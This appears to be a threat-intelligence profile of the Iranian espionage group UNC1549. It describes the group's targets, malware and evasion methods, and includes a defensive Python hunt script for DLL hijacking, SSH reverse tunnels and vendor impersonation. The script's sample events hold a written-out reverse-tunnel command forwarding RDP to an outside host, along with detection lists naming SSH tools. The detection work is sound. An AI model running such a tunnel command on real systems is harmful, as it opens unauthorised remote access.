Smoke Sandstorm
UNC1549 is an Iranian state-backed cyber-espionage group assessed with high confidence to be linked to the Islamic Revolutionary Guard Corps (IRGC), with significant overlap with the Tortoiseshell cluster. Overlapping activity is tracked by other vendors as Imperial Kitten (CrowdStrike), GalaxyGato (ESET), Subtle Snail (PRODAFT), Nimbus Manticore (Check Point), and Smoke Sandstorm (Microsoft). First publicly reported in early 2024, UNC1549 primarily targets the aerospace, aviation, and defense sectors in Israel, the UAE, Qatar, and Saudi Arabia, and also in the US and Spain, and has since expanded to technology, hospitality, finance, and transportation.

For initial access the group relies on spear-phishing (often with job-themed lures), supply chain attacks, and credential theft, frequently compromising third-party suppliers so that trusted relationships carry it past better-defended targets. Its custom tooling includes Twostroke (a C++ backdoor), Deeproot, Crashpad, Dcsyncer.slick (DCSync-style extraction of Active Directory password hashes), Ghostline, Pollblend (tunneling), Sightgrab (screenshots), Trusttrap (credential theft via spoofed pop-ups), and Lightrail. The group also abuses code-signing certificates, notably ones issued by SSL.com, to sign its malware, which markedly lowers detection rates. Its binaries mimic legitimate software from Fortinet (FortiGate), Microsoft, Nvidia, Citrix, and VMware, and in some cases the genuine software is installed so that it loads a malicious binary.

To evade detection and keep long-term access, UNC1549 uses DLL search order hijacking, SSH reverse tunnels, and deletion of forensic artifacts, and deploys backdoors that can remain dormant for months. Its operations are characterized by strategic intelligence gathering and theft of sensitive data (email, intellectual property, network documentation) in support of Iran's military and geopolitical objectives, including missile and drone programs and sanctions circumvention. The group is highly adaptive: it anticipates incident response and works to retain persistence even after remediation attempts.
These activities sit within a broader Iranian cyber campaign against critical infrastructure and in support of covert procurement networks. Overlapping cluster names used by other vendors include Tortoiseshell, Subtle Snail, Nimbus Manticore, and Smoke Sandstorm.
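As an added example (not code from this page or from Mallory), the Python below turns three of the behaviours described above into hunt heuristics and runs them over a handful of constructed, Sysmon-style events: a known-name system DLL loaded from outside the system directories (search order hijacking / side-loading), an SSH client started with a -R remote forward (reverse tunnel), and a binary whose path borrows a vendor brand while its Authenticode signer is a different organisation (vendor impersonation). The event field names, the sample paths, the signer "Contoso Technologies Ltd" and the issuer string are all assumptions for illustration; none of them are indicators from this actor.

```python
"""Hunt heuristics for three behaviours attributed to UNC1549: DLL search order
hijacking, SSH reverse tunnels, and vendor-impersonating binaries signed under an
unexpected organisation. Runs over constructed Sysmon-style events, not real
telemetry; the field names are assumptions, not any product's schema."""
import re
import shlex
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Optional

# Generic set of system DLL names that side-loading and search-order hijacks
# commonly impersonate (not specific to UNC1549).
HIJACK_PRONE_DLLS = {"version.dll", "dbghelp.dll", "wininet.dll", "winhttp.dll",
                     "cryptbase.dll", "profapi.dll", "cryptsp.dll", "dwmapi.dll"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Brand token that may appear in a mimicked path -> organisation expected in its signer.
VENDOR_SIGNERS = {"forti": "fortinet", "nvidia": "nvidia", "citrix": "citrix",
                  "vmware": "vmware", "microsoft": "microsoft"}

SSH_CLIENTS = {"ssh.exe", "ssh", "plink.exe"}
FORWARD_SPEC = re.compile(r"^\d+:[^:\s]+:\d+$")   # port:host:hostport, e.g. 2222:127.0.0.1:3389

# Constructed sample events (assumed schema; paths, signer and issuer are made up).
SAMPLE_EVENTS = [
    {"type": "image_load", "image": r"C:\Windows\System32\svchost.exe",          # benign
     "loaded": r"C:\Windows\System32\version.dll", "signer": "Microsoft Windows"},
    {"type": "image_load", "image": r"C:\Users\alice\AppData\Local\NvidiaDisplay\nvdisplay.exe",
     "loaded": r"C:\Users\alice\AppData\Local\NvidiaDisplay\version.dll",      # side-load
     "signer": "Contoso Technologies Ltd"},
    {"type": "process_create", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",  # reverse tunnel
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:3389 -o StrictHostKeyChecking=no ops@203.0.113.10",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"type": "process_create", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",  # benign ssh
     "cmdline": "ssh.exe -p 22 admin@10.0.0.5", "parent": r"C:\Windows\System32\cmd.exe"},
    {"type": "process_create", "image": r"C:\ProgramData\FortiClient\FortiClient.exe",
     "cmdline": "FortiClient.exe", "signer": "Contoso Technologies Ltd",       # impersonation
     "issuer": "SSL.com EV Code Signing Intermediate CA RSA R3"},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    event_index: int
    detail: str


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _dirname(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def check_dll_hijack(ev: dict) -> Optional[str]:
    """Known-name system DLL resolved from outside the system directories."""
    if ev.get("type") != "image_load" or _basename(ev["loaded"]) not in HIJACK_PRONE_DLLS:
        return None
    loaded_dir = _dirname(ev["loaded"])
    if loaded_dir.startswith(SYSTEM_DIRS):
        return None
    where = "its own directory" if loaded_dir == _dirname(ev["image"]) else loaded_dir
    return f"{_basename(ev['image'])} loaded {_basename(ev['loaded'])} from {where}"


def check_reverse_tunnel(ev: dict) -> Optional[str]:
    """SSH client invoked with a -R remote forward (the reverse-tunnel shape)."""
    if ev.get("type") != "process_create" or _basename(ev["image"]) not in SSH_CLIENTS:
        return None
    argv = shlex.split(ev.get("cmdline", ""), posix=False)   # keep Windows backslashes intact
    for i, tok in enumerate(argv):
        spec = argv[i + 1] if tok == "-R" and i + 1 < len(argv) else (tok[2:] if tok.startswith("-R") else "")
        if spec and FORWARD_SPEC.match(spec):
            return f"remote forward {spec} to {argv[-1]}"
    return None


def check_vendor_impersonation(ev: dict) -> Optional[str]:
    """Path borrows a vendor brand, but the signer is a different organisation.
    The issuer is reported as context only; SSL.com also issues legitimate certs."""
    path, signer = ev.get("image", "").lower(), ev.get("signer", "").lower()
    for brand, org in VENDOR_SIGNERS.items():
        if brand in path and org not in signer:
            return (f"'{brand}' in path but signed by '{ev.get('signer', '<unsigned>')}' "
                    f"(issuer: {ev.get('issuer', 'unknown')})")
    return None


CHECKS = {"dll_search_order_hijack": check_dll_hijack,
          "ssh_reverse_tunnel": check_reverse_tunnel,
          "vendor_impersonation": check_vendor_impersonation}


def hunt(events) -> list:
    """Apply every check to every event and collect the hits."""
    return [Finding(rule, idx, detail)
            for idx, ev in enumerate(events)
            for rule, fn in CHECKS.items()
            if (detail := fn(ev))]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_index}: {f.detail}")
```

The vendor check deliberately keys on the mismatch between the brand claimed by the path and the signing organisation rather than on the SSL.com issuer alone, since that CA issues many legitimate certificates; the issuer is surfaced only to help an analyst prioritise. Against the constructed events, the side-loading binary is caught twice (hijack-prone DLL from a user directory, and an Nvidia-branded path signed by someone else), the -R invocation is flagged while the plain outbound ssh is not, and the FortiClient look-alike is flagged on the signer mismatch.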
Recent activity
5 sources tracked across advisories, community write-ups, and news.
UNC1549 (Nimbus Manticore) is an Iranian cyber-espionage group targeting aerospace, aviation, and defense sectors.
UNC1549 is an Iranian state-sponsored threat actor known for targeting aerospace, aviation, and defense industries in the Middle East. The group has evolved its operations by deploying multiple custom malware variants and advanced post-exploitation techniques to maintain persistence and evade detection.
UNC1549 is conducting espionage campaigns targeting aerospace, aviation, and defense organizations, as well as expanding to technology, hospitality, finance, and transportation sectors. The group uses spear-phishing, supply chain attacks, and custom malware to steal sensitive information, intellectual property, and credentials, primarily for strategic intelligence gathering aligned with Iranian interests.
UNC1549 is an Iranian cyber espionage group linked to Charming Kitten APT, known for using code-signing certificates from SSL.com to sign malware, making it harder to detect. They have targeted European organizations with backdoors and infostealers, leveraging fraudulent or impersonated companies to acquire valid certificates.